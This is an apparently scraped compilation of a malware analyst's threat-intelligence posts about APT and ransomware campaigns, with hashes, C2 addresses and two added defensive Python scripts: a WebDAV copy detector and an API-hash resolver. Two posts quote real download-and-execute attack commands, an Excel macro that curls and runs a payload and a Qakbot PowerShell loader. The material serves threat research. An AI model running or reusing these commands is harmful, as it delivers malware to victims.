"Brief analysis of the compromised 3CXDesktopApp: Digitally signed 3CXDesktopApp installer. Installs itself in the registry for persistence: "C:\Users\RE\AppData\Local\Programs\3CXDesktopApp\3CXDesktopApp.exe" autoLaunch. DLL side loading with a dropped DLL payload called 'ffmpeg.dll'"
X Link 2023-03-30T15:25Z [----] followers, 17.4K engagements

"Threat actors actively abuse "Robocopy" (a built-in Windows utility) to deliver malware from WebDAV. You can quickly detect this behavior by using SIGMA rule: Malware Sample: https://bazaar.abuse.ch/sample/62fce3f773ec3911fe1a20d3aca1fced6c1a5afa4d8f58711e49232b7dc9c111 https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_copy_system_dir_lolbin.yml"
X Link 2025-06-30T12:54Z [----] followers, [----] engagements
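The behaviour the post above points at, a copy utility pulling a payload off a WebDAV share, is easy to express as process-creation detection logic. The script below is an added example and is not the SigmaHQ rule linked in the post: it is an illustrative detector over Sysmon-style Event ID 1 records that flags robocopy.exe or xcopy.exe when the command line carries the WebDAV mini-redirector UNC form (\\host[@SSL][@port]\DavWWWRoot\...), and marks whether the destination is a user-writable directory. The records, hostnames (RFC 5737 documentation addresses) and paths are all constructed.

```python
"""Flagging robocopy/xcopy pulling files from a WebDAV share.

Added example, not the SigmaHQ rule linked above: an illustrative detector over
Sysmon-style process-creation records. The records below are constructed;
hosts use RFC 5737 documentation addresses.
"""
import re
from pathlib import PureWindowsPath

COPY_TOOLS = {"robocopy.exe", "xcopy.exe"}

# UNC form the Windows WebClient (WebDAV mini-redirector) serves:
#   \\host[@SSL][@port]\DavWWWRoot\...
WEBDAV_UNC = re.compile(r"\\\\[\w.-]+(?:@ssl)?(?:@\d{1,5})?\\davwwwroot\\", re.I)

# Destinations an unprivileged user can write to; a payload staged from WebDAV
# into one of these is the pattern worth escalating first.
WRITABLE_DEST = re.compile(r"\\(?:users\\[^\\\s]+\\|programdata\\|windows\\temp\\|temp\\)", re.I)


def detect_webdav_copy(event):
    """Return a finding dict for a suspicious copy, or None for anything else."""
    image = PureWindowsPath(event.get("Image", "")).name.lower()
    cmdline = event.get("CommandLine", "")
    if image not in COPY_TOOLS or not WEBDAV_UNC.search(cmdline):
        return None
    return {
        "EventId": event.get("EventId"),
        "Image": image,
        "user_writable_dest": bool(WRITABLE_DEST.search(cmdline)),
        "CommandLine": cmdline,
    }


def scan(events):
    """Run the detector over a batch of records and keep only the hits."""
    findings = (detect_webdav_copy(e) for e in events)
    return [f for f in findings if f is not None]


# Constructed Sysmon Event ID 1 records (fields trimmed to what the detector reads).
SAMPLE_EVENTS = [
    {"EventId": 101, "Image": r"C:\Windows\System32\robocopy.exe",
     "CommandLine": r"robocopy.exe \\203.0.113.10@SSL\DavWWWRoot\share C:\Users\Public\Libraries /E"},
    {"EventId": 102, "Image": r"C:\Windows\System32\xcopy.exe",
     "CommandLine": r"xcopy \\files.example.test@80\DavWWWRoot\docs\x.dll C:\Windows\Temp\ /Y"},
    {"EventId": 103, "Image": r"C:\Windows\System32\robocopy.exe",
     "CommandLine": r"robocopy \\fileserver01\share C:\Backups /MIR"},  # benign SMB copy
    {"EventId": 104, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c dir \\203.0.113.10\DavWWWRoot\docs"},  # not a copy tool
    {"EventId": 105, "Image": r"C:\Windows\System32\robocopy.exe",
     "CommandLine": r"robocopy.exe \\203.0.113.10\DavWWWRoot\u C:\Program Files\App /E"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f["EventId"], f["Image"], "writable-dest" if f["user_writable_dest"] else "other-dest")
```

Two caveats when turning this into a production rule: the WebClient service is also reachable through `net use` drive mappings, which this UNC regex will not see, and a copy from a WebDAV share into Program Files is still worth a look even though it is ranked lower here.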

"FIN7 infrastructure used to deliver POWERTRASH loader. According to @CISACyber same infrastructure used to exploit CVE-2023-27350 PaperCut. @h2jazi @MsftSecIntel https://www.virustotal.com/graph/embed/g65ae58b36933476ebb5d1288d1cd438ff0bea8e5c49d4424ad46b4d2bcf7b918theme=dark"
X Link 2023-05-20T08:45Z [----] followers, 18.5K engagements

"🚨New research reveals a cyber espionage campaign targeting Indian government including agencies responsible for electronic communications IT governance and national defense. Full details on the tactics and implications are here: #CyberSecurity #Malware https://blog.eclecticiq.com/operation-flightnight-indian-government-entities-and-energy-sector-targeted-by-cyber-espionage-campaign"
X Link 2024-03-27T11:21Z [----] followers, 18.8K engagements

"New Raccoon Stealer campaign 🦝 greencracks.com - Cracked MalwareBytes lure @MBThreatIntel DGA and bit.ly abused to redirect the initial downloader. Raccoon Stealer C2 Panel: http://94.131.106.116 MD5 Hash: 27909cdf575b73bba157c6437aaf6417 @JAMESWT_MHT @cyb3rops"
X Link 2022-09-17T13:16Z [----] followers, [---] engagements

"@ersincmt Hello Mr. Ersin, the Infinitum IT Cyber Threat Intelligence team carried out an analysis of this attack about [--] weeks ago. We shared the analysis report in Turkish; if you are interested, here is the link: https://www.linkedin.com/posts/infinitumlabs_t%C3%BCrkiyedeki-devlet-kurumlar%C4%B1n%C4%B1-hedef-alan-activity-6962042931998277632-OKZSutm_source=linkedin_share&utm_medium=member_desktop_web"
X Link 2022-08-20T15:30Z [----] followers, [--] engagements

"Observed IP's exploiting CVE-2023-36884: 74.50.94.156 104.234.239.26 94.232.40.34 66.23.226.102"
X Link 2023-07-12T19:02Z [----] followers, 29.7K engagements

"Malware Deobfuscation with @OpenAI. Remcos malware delivery via ISO: Obfuscated VBS -> PowerShell -> Download Second Stage -> Inject into ielowutil.exe. Injected Remcos: https://tria.ge/230812-t6nmbscf33/static1"
X Link 2023-08-12T16:46Z [----] followers, 15K engagements

"@GossiTheDog @BushidoToken @Gi7w0rm This is the reproduced malware that executes calc.exe as a PoC"
X Link 2022-05-29T14:03Z [----] followers, [---] engagements

"DarkPink APT activity continues with a rice trade lure: ISO -> WinWord.exe -> DLL SideLoading -> Winlogon Persistence. MD5: 98beb20ef1e4d629965c9132be8feb07 (Update Counterdraft on the MoU on Rice) @h2jazi @malwrhunterteam @ShadowChasing1"
X Link 2023-05-17T13:40Z [----] followers, 13.8K engagements

"Ivanti EPMM stored MySQL creds in cleartext (/mi/files/system/.mifpp). Threat actors accessed the DB and exfiltrated mobile device metadata (IMEI, SIM, location), LDAP configs and Office [---] tokens from potentially thousands of victims. Read more here: https://blog.eclecticiq.com/china-nexus-threat-actor-actively-exploiting-ivanti-endpoint-manager-mobile-cve-2025-4428-vulnerability"
X Link 2025-05-22T07:20Z [----] followers, [----] engagements

"#APT #Gamaredon Malicious HTA files contain Base64-encoded VBScript 6bd8ff39e46e501c7d3ece116861121207741abb92f5e12a527cdf8b7c2c4cb8 9e1d16b50209d83aaa92ad8391982d99a9cee280e51cfe2c5b9c080599697837 C2: t.me/s/oearps 137.184.2.98/jug/71.aif=Function"
X Link 2023-01-21T20:28Z [----] followers, 14.3K engagements

"@thegrugq Also this is suspicious. A pull request for Google's oss-fuzz was opened that changes the URL for the project from http://tukaani.org/xz/ to http://xz.tukaani.org/xz-utils/"
X Link 2024-03-29T21:47Z [----] followers, 15.5K engagements

"When Lazarus gets an reverse shell on my sandbox device"
X Link 2023-04-20T12:41Z [----] followers, [----] engagements

"Tomorrow I will share my findings about new Lockbit [---] Ransomware sample. Details for defending your organization against this attack will be shared in this report. Stay tuned :)"
X Link 2022-07-04T17:11Z [----] followers, [--] engagements

"Summary of the Treasury Department breach (per public sources): A key unresolved cybersecurity issue lies in securing third-party vendor relationships. cc @BushidoToken @DrunkBinary @cyb3rops @TLP_R3D"
X Link 2025-01-06T19:21Z [----] followers, [----] engagements

"New Lockbit [---] Ransomware sample with YARA match @malwrhunterteam @struppigel https://www.virustotal.com/gui/file/0d38f8bf831f1dbbe9a058930127171f24c3df8dae81e6aa66c430a63cbe0509/detection"
X Link 2022-07-16T13:48Z [----] followers, [--] engagements

"Related: (Installing Cobalt Strike shellcode by using a picture) ab8fbe7e6341b306357fe4ca954f73031baa2774fb025583720ac12490612819 hxxp://47.102.122.197/1.jpg Decrypted Shellcode: 7e859f2a3d5e885f06d42bd740cd4b6aff19891e9d33bc9789eb38e2a4285898 Cobalt Strike C2: hxxp://47.102.122.197:9999/q2Iq #Golang #Shellcode Injector MD5: c81184751669277a6de15de36f33138d C2: 117.50.62.88:9903 Definitely interesting🤔 https://t.co/worVSXpO4k"
X Link 2023-04-18T17:44Z [----] followers, 23.7K engagements

"#Golang #Shellcode Injector MD5: c81184751669277a6de15de36f33138d C2: 117.50.62.88:9903 Definitely interesting🤔"
X Link 2021-02-26T23:07Z 25.5K followers, [--] engagements

"On May [--] [----] following heightened India-Pakistan tensions, Pakistan Telecommunication Company (PTCL) was hit by a phishing attack leveraging a spoofed email appearing to be from Pakistan's Counter Terrorism Department, using a Security Brief Report lure to deceive recipients. The email carried an IQY (Excel Web Query) attachment. Once opened it connected to fogomyart.com/random.php and executed an Excel macro with the following command: =cmd|' /c cd C:\programdata & set /P="MZ"<nul>b1 & curl -o b2 https://fogomyart.com/vcswin & copy /b b1+b2 vcswin.exe & start /b vcswin.exe'!A0 This command"
X Link 2025-05-11T10:04Z [----] followers, [----] engagements

"🕵Gamaredon #APT activity targeting the State Bureau of Investigation in Ukraine (DBR): Phishing email -> XHTML Smuggling Payload -> Download RAR -> LNK -> MSHTA LOLBIN -> Download third stage. Email: 27515d71b91bbdbb55437de6b729663c0cd206d7112ddbc439d82d8a6e1dde3e HTML Payload: b5d59bb932843ca58c29971e73edfe642731701f29133eb1cfb8841e198d567f Download Second Stage RAR file from: entities-important-surgeon-ever.trycloudflare.com LNK File: 35f714c491897d32c7c68386dac02615071ae4587729dc46d524c6e468ac1cbe"
X Link 2024-12-06T14:41Z [----] followers, [----] engagements

"Cyber Army of Russia Reborn (CARR) is a hacktivist Telegram persona associated with #APT44 by @Mandiant. CARR prepared a training for DDoS attacks against Ukrainian targets; you can see the username of the device is "SergoZar", which is likely associated with GitHub user "SergoZar". The persona "SergoZar" is using a public portfolio page and following himself, which is Mr. Alexander Ryabov aka "ZKelo" or "SergoZar". It's just an assumption; I'm not linking Cyber Army of Russia Reborn (CARR) to this gentleman, but for me this profile is matching an interesting link. What do you think @BushidoToken"
X Link 2024-04-19T21:31Z [----] followers, 18.5K engagements

"#Qakbot Claim_Copy_3519_Sep_20.html -> ISO -> LNK -> JS -> BAT -> regsvr32 -> Load times.db (DLL). times.db: 29ac39065f707311a3281268b643a66fdbd2d08c01eaea8bf6229364c69201a6 @malwrhunterteam @Gi7w0rm @Max_Mal_ @pr0xylife"
X Link 2022-09-23T17:21Z [----] followers, [--] engagements

"🚨Here is my analysis on GLOBAL GROUP RaaS. I identified the IP address behind their Tor-based Dedicated Leak Site (DLS): 193.19.119.4. The server is hosted by IpServer, a Russia-based VPS provider also previously used to host the DLS infrastructure for the Mamona RIP ransomware operation. The GLOBAL GROUP RaaS manager (alias $$$) actively seeks remote access to corporate networks via Initial Access Brokers (IABs). They target enterprise VPN appliances (Fortinet, Palo Alto, Cisco) and routinely acquire RDP access to high value targets."
X Link 2025-07-15T07:57Z [----] followers, 16.6K engagements

"EclecticIQ links GLOBAL GROUP to the actor behind BlackLock RaaS. This group uses AI-powered ransom negotiations & a mobile control panel targeting healthcare & automotive sectors in the US UK and Europe. 👉 Learn more: #cybersecurity #ransomware https://hubs.ly/Q03xcYK00"
X Link 2025-07-15T06:55Z [----] followers, 10.6K engagements

"@vxunderground The page used some Turkish language and it appears that the CSS code was copied and pasted from a random Turkish forum"
X Link 2023-05-08T21:50Z [----] followers, [----] engagements

"Don't touch our home routers dude it's creepy 😐. According to Microsoft the Chinese APT group Volt Typhoon camouflages its command-and-control (C2) network activities by compromising small office and home office (SOHO) network equipment. The previous report highlights that Volt Typhoon employs a modified version of the Fast https://t.co/6RoMEnu5Un"
X Link 2024-05-11T20:31Z [----] followers, [----] engagements

"google-drive.zip 😂 @malwrhunterteam"
X Link 2023-05-19T19:12Z [----] followers, [----] engagements

"Fresh #GOZI sample with [--] detections in VT. Execution flow: ZIP (QuickBooks-IXAUYWQ) -> LNK -> msiexec. MD5: 82ff84cb9924f0855a894e75b5d3edb2 C2: sumarno.top @malwrhunterteam @StopMalvertisin @1ZRR4H https://tria.ge/230525-2j1x5sdd61/behavioral1"
X Link 2023-05-25T22:47Z [----] followers, [----] engagements

"2nd stage of PowerShell Bumblebee loader De-Obfuscated feel free to take a look : cc @Gi7w0rm @malwrhunterteam @BushidoToken https://gist.github.com/whichbuffer/0c109be7b8b01d13178c07d66cdf82d5"
X Link 2022-09-07T08:22Z [----] followers, [--] engagements

"@malwrhunterteam @JAMESWT_MHT I also wanted to mention an awesome tool called HashDB I used for reverse engineering the API hashing @herrcore it sped up the analysis process 👏 Lockbit Decrypter was using the "FNV-1a non-cryptographic hash function" for hiding the Import Tables. https://github.com/OALabs/hashdb"
X Link 2022-06-20T12:11Z [----] followers, [--] engagements
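The two API-hashing posts above, Qakbot resolving its IAT through CRC32 hashes that are XORed with a statically stored key, and the LockBit decrypter hiding its import table behind FNV-1a, use the same resolution idea: hash every export name with the sample's algorithm, undo any static obfuscation on the stored hash, and match. The script below is an added example, not code from the posts, from Qakbot, from LockBit or from HashDB: the export list is a constructed subset of kernel32.dll's exports, and the XOR key and the "stored" hash list are invented for the illustration.

```python
"""Resolving API hashes: CRC32 (as in the Qakbot post) and FNV-1a (as in the LockBit post).

Added example, not code from the posts above. The export list, the static XOR key
and the "stored" hash list are constructed here; a real sample carries its own.
"""
import zlib

FNV1A_OFFSET = 0x811C9DC5
FNV1A_PRIME = 0x01000193


def fnv1a32(data):
    """32-bit FNV-1a: XOR the byte in, then multiply by the prime (mod 2^32)."""
    h = FNV1A_OFFSET
    for b in data:
        h ^= b
        h = (h * FNV1A_PRIME) & 0xFFFFFFFF
    return h


def crc32(data):
    """Standard CRC-32 (IEEE), the variant zlib and most packers implement."""
    return zlib.crc32(data) & 0xFFFFFFFF


HASHERS = {"crc32": crc32, "fnv1a": fnv1a32}

# Constructed stand-in for kernel32.dll's export table. On a real box you would
# read the names out of the DLL's export directory (e.g. with pefile).
KERNEL32_EXPORTS = [
    "LoadLibraryA", "GetProcAddress", "VirtualAlloc", "VirtualProtect",
    "CreateFileW", "WriteFile", "CloseHandle", "ExitProcess",
]


def build_table(exports, algo):
    """Precompute hash -> name once so each stored hash resolves with one lookup."""
    hasher = HASHERS[algo]
    return {hasher(name.encode("ascii")): name for name in exports}


def resolve_hashes(stored, xor_key, table):
    """Strip the static XOR the malware applies to each stored hash, then look it up.
    Hashes with no match are reported as UNKNOWN_<hash> so the analyst sees them."""
    resolved = []
    for h in stored:
        plain = (h ^ xor_key) & 0xFFFFFFFF
        resolved.append(table.get(plain, f"UNKNOWN_{plain:08x}"))
    return resolved


def demo():
    xor_key = 0x5A3C7F11  # constructed stand-in for the static key found in a sample
    table = build_table(KERNEL32_EXPORTS, "crc32")
    # Constructed stored hashes, built the way a packer would: crc32(name) ^ key.
    stored = [crc32(n.encode()) ^ xor_key for n in ("VirtualAlloc", "GetProcAddress")]
    stored.append(0xDEADBEEF)  # one hash that is not in our table
    return resolve_hashes(stored, xor_key, table)


if __name__ == "__main__":
    print(demo())
```

Switching `"crc32"` for `"fnv1a"` in `build_table` covers the LockBit case; when neither matches, the unresolved entries are the hint that the sample uses a tweaked constant or a non-standard variant, which is exactly the situation a precomputed database like HashDB is for.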

"I can confirm that the latest patch #microsoft #windows CVE-2022-26925 was related to PetitPotam, found by @topotam77. An unauthenticated attacker could call a method on the LSARPC interface and coerce the domain controller to authenticate to the attacker using NTLM"
X Link 2022-05-11T06:46Z [----] followers, [--] engagements

"@h4x0r_dz It's not from Microsoft for sure 😅"
X Link 2024-04-25T19:20Z [----] followers, 13.6K engagements

"Likely APT-C-55 (Kimsuky) activity: ISO -> LNK -> BAT -> AV vendor check (Kaspersky or Avast) -> Download Second Stage (HTA). MD5: 5b39fc810261ce179e8348e11a840c15 URL: trusteer.ink/rapport/32.hta Previous activity similar to this: MD5: 7753f37dfbc44815282433f16b56c0ce"
X Link 2023-05-16T17:53Z [----] followers, [----] engagements

"🕷🕸SCATTERED SPIDER phishing activities: Registrar: - Hosting Concepts B.V. d/b/a Registrar EU iuiuiemon.com - 2024-11-13 vision-victra.com - 2024-11-09 cc @BushidoToken @malwrhunterteam @TLP_R3D @AlvieriD @ImposeCost"
X Link 2024-11-25T14:53Z [----] followers, [----] engagements

"More Raccoon Stealer IOCs 🦝 MD5 Hash: 5261d68f844325d038c8b1d7d215a91e C2 Servers: 94.131.104.18 45.67.229.149 Downloader: http://193.149.129.144/rgd4rgrtrje62iuty/19658963328526236.bin cc @malwrhunterteam @malware_traffic"
X Link 2022-09-18T15:50Z [----] followers, [--] engagements

"Pivoting possible Volt Typhoon infrastructure. Each of the hosts is using: SSL Certificate C=en ST=rg L=df O=vb OU=ty CN=jdyfj nginx 1.20.1 and redirects to google 2.58.15.30 66.85.27.190 45.32.174.131 cc @DrunkBinary @TomHegel @BushidoToken"
X Link 2024-04-25T21:06Z [----] followers, [----] engagements

"Russian cybercriminals behind the DanaBot malware built a version specifically to target government and military entities. There's no direct proof Russian intelligence is involved, but it's likely they benefit from or use the tools and access to these backdoored systems. https://www.justice.gov/usao-cdca/pr/16-defendants-federally-charged-connection-danabot-malware-scheme-infected-computers"
X Link 2025-05-23T19:25Z [----] followers, [----] engagements

"Reversing a Go binary in IDA. We can see that it's being used for getting Initial Access on the victim device by communicating with C2_IP over port [----], and Powershell.exe will be used as the default Command and Scripting Interpreter by the attacker. @malwrhunterteam"
X Link 2022-07-27T19:15Z [----] followers, [--] engagements

"The SAP NetWeaver exploit (CVE-2025-31324) is seriously bad. I've seen some of the targets, it's horrifying. There are critical infrastructure networks affected 😬"
X Link 2025-04-30T22:38Z [----] followers, [----] engagements

"There is a lot of disinformation and counterintelligence activity circulating in Telegram channels. If you are a journalist or a CTI analyst, stay cautious: your role is to provide accurate information, not to amplify the hype"
X Link 2025-08-21T13:38Z [----] followers, [----] engagements

"Just use Linux nerds"
X Link 2024-07-19T09:40Z [----] followers, [----] engagements

"Rhadamanthys info stealer malware using an EU GDPR phishing lure. After execution it opens a PDF document as part of the lure. C2: 141.98.82.254 41f7c8ae34676fe524a70b8474e1c31c42d70301edf091c1e8ae320b7f3d1646"
X Link 2022-12-28T13:18Z [----] followers, [----] engagements

"@hackerfantastic lmao"
X Link 2025-03-07T18:36Z [----] followers, [----] engagements

"PlugX Payload (work2022.tmt) is encrypted with the XOR key "0x1E43"; it's being decrypted by the PlugX loader "LMIGuardianDLL.dll" on execution. Decrypted payload can be found here. Decrypted PlugX config file can be seen in the image https://www.virustotal.com/gui/file/a9f7d06b9929be61853910876129318ef56efd1eaef168e9ac412a090a6f09da?nocache=1 #MustangPanda #APT Summary MSs reporting - recommendationl.zip ecb1650d5f548f10be47aaa84f7546c0 Summary MSs reporting - recommendationl.doc.lnk 2db2698bd4c922a04db0839e6fc1146b LMIGuardianDll.dll aa47fc240f70945b80413ac3c714e2a2 LMIGuardianDat.dat"
X Link 2023-01-05T14:26Z [----] followers, [----] engagements

"#MustangPanda #APT Summary MSs reporting - recommendationl.zip ecb1650d5f548f10be47aaa84f7546c0 Summary MSs reporting - recommendationl.doc.lnk 2db2698bd4c922a04db0839e6fc1146b LMIGuardianDll.dll aa47fc240f70945b80413ac3c714e2a2 LMIGuardianDat.dat"
X Link 2023-01-05T11:27Z 16.4K followers, 21.1K engagements

"Ukrainian City Councils (Pechersk and Khmelnytskyi) were very likely targeted by an unknown threat actor. A spear-phishing email was used to deliver an encrypted RAR attachment containing Remcos RAT. https://www.virustotal.com/gui/file/af600672e924a603bd96687954d7bb26950f1e891d923bff99981a91a0626026"
X Link 2023-02-23T19:23Z [----] followers, [----] engagements

"Qilin ransomware affiliate hastalamuerte claims he lost $48K after a ransom negotiation mysteriously disappeared from a Tox chat. In the same thread, another actor, Nova, posted credentials and a screenshot of Qilin's affiliate panel to embarrass the group. ji57fr53anp7wb44tbbnp72qcgbhqywy4jmbncawdcrejj5amuvh3zqd.onion"
X Link 2025-07-31T14:58Z [----] followers, [----] engagements

"CheckZilla is being used by Threat Actors for automatically calculating the evasiveness of a #Malware; the idea is that, unlike VirusTotal, it doesn't send metadata to AV vendors. CheckZilla is also being advertised on the RAMP forum. @malwrhunterteam @JAMESWT_MHT"
X Link 2022-07-02T09:23Z [----] followers, [--] engagements

"Arkana Ransomware affiliates likely targeted WideOpenWest (an ISP in California) by compromising Appian (code automation platform) and Symphonica (cloud-native orchestration platform). Some key cloud security takeaways: 1- Avoid exposing company identifiers (e.g. name, SSL certs, logo) in cloud assets. 2- Continuously monitor for leaked or reused credentials. 3- Audit third-party SaaS configurations and access permissions regularly. 4- Use 2FA :( cc @BushidoToken @vxunderground @DrunkBinary @LawrenceAbrams https://web.archive.org/web/20250324043643/https://wowinc.appiancloud.com/suite/ Arkana"
X Link 2025-03-25T08:52Z [----] followers, [----] engagements

"Arkana ransomware group claims to have compromised an Internet Service Provider in California. They were even nice enough to put together a music video montage illustrating the level of access they possess"
X Link 2025-03-25T02:47Z 418K followers, 63.1K engagements

"I'm following a generic backdoor that I named "Kerper" because of the PDB file path. The C2 connections depend on the variant. So far I have seen that Microsoft Graph API and Microsoft Azure (akams.azurewebsites.net) services were abused"
X Link 2023-03-30T17:25Z [----] followers, [----] engagements

"YARA rule to detect this new campaign. https://github.com/whichbuffer/eiq-community-exchange/blob/30d58253c6bc29bf223fd55c4af6ac0701b537e6/yara/Windows_1000-1999/Y1801.yara#L70 #Qakbot - BB14 - .one .cmd .ps .dll cmd.exe /c Open.cmd powershell Invoke-WebRequest -URI https://nerulgymkhana.com/CCoN/01.gif -OutFile C:\programdata\putty.jpg rundll32 C:\programdata\putty.jpg,Wind IOC's https://t.co/iJ3jXKg9aB https://t.co/5kmcgUPnIh"
X Link 2023-02-07T22:51Z [----] followers, [----] engagements

"#Qakbot - BB14 - .one .cmd .ps .dll cmd.exe /c Open.cmd powershell Invoke-WebRequest -URI https://nerulgymkhana.com/CCoN/01.gif -OutFile C:\programdata\putty.jpg rundll32 C:\programdata\putty.jpg,Wind IOC's https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB14_07.02.2023.txt"
X Link 2023-02-07T21:44Z 21.1K followers, 34.6K engagements

"🎉 Happy to share that my talk has been accepted at @virusbtn. I'll be presenting in Berlin on Friday September [--] at #VB2025: Details: See you there #vbconference https://www.virusbulletin.com/conference/vb2025/abstracts/cracked-gru-how-russias-notorious-sandworm-unit-weaponizes-pirated-software-usage-target-ukraine/"
X Link 2025-05-02T14:17Z [----] followers, [----] engagements
